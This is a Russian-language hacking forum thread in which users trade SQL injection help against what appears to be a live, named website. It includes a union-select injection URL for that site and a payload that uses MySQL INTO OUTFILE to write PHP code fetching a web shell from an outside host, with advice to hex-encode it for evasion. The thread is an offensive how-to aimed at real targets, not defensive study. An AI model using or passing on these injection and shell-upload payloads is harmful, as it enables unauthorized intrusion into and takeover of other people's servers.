12.01.2009, 08:35
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от R1dex
1. Попробуй:
Код:
http://megaload.megalan.tv/program.php?id=-3613+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
2. Возможно, там просто нету вывода. пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
|
|
|
12.01.2009, 08:38
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
Сообщение от vakula
пустота, а раньше показывало...убрали небось
p.s. дай линк где описывается поиск уязвимостей
спс
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. 
|
|
|
|
12.01.2009, 12:03
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от a1ex
Скорее всего просто отключили вывод ошибок и нетолько,поэтому тебе невидно. вывод ошибок остался
|
|
|
|
12.01.2009, 08:42
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
|
|
|
|
12.01.2009, 13:14
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
всё, порешал спасибо. просто перед id=1302 нада біло поставить `-` id=-1302
|
|
|
|
12.01.2009, 08:09
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
vakula
version() - за место 3его поля.
|
|
|
|
12.01.2009, 08:29
|
|
Познающий
Регистрация: 20.01.2008
Сообщений: 44
С нами:
9634789
Репутация:
4
|
|
Сообщение от a1ex
vakula
version() - за место 3его поля.
игнорирует, исходную показывает. а если ошибку сделаю или не в то поле...тогда показывает что ошибка.
|
|
|
|
12.01.2009, 09:20
|
|
Новичок
Регистрация: 13.12.2008
Сообщений: 15
С нами:
9162462
Репутация:
2
|
|
Помогите, пожалуйста, с заливкой шелла.
Есть сайт на дедике, на дедике установлена Windows Server 2003.
Есть MySQL 4 версии, раскрученная.
Есть путь вида: M:\Inetpub\vhosts\[SITE]\httpdocs\script.php - он выводится при ошибке скули.
Есть привилегии типа File_Priv
Будет неплохо, если набросаете хороших faq или статей. Те, что гуглил я не помогли. Желательно расписать очень подробно. с Linux только начинаю дружить.
Заранее спасиб.
Последний раз редактировалось Basilio; 12.01.2009 в 09:24..
|
|
|
|
12.01.2009, 09:45
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
Basilio
union select 1,<?php copy("http://tvoi.site/shell.txt","./shell.php"); ?>,3 from mysql.user into outfile 'M:\Inetpub\vhosts\[SITE]\httpdocs\scr.php'/*
Потом переходишь на scr.php, и шелл копируется в shell.php 
p.s: php код лучше в hex перевести
|
|
|
|
12.01.2009, 10:07
|
|
Новичок
Регистрация: 13.12.2008
Сообщений: 15
С нами:
9162462
Репутация:
2
|
|
Сообщение от aka PSIH
Basilio
Потом переходишь на scr.php, и шелл копируется в shell.php
p.s: php код лучше в hex перевести
а какой шелл лучше использовать (кинь линк), конфигурацию я написал.
Просто те шеллы, которые выложены на milw0rm они вроде все написаны для консоли линуха. или я не прав?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
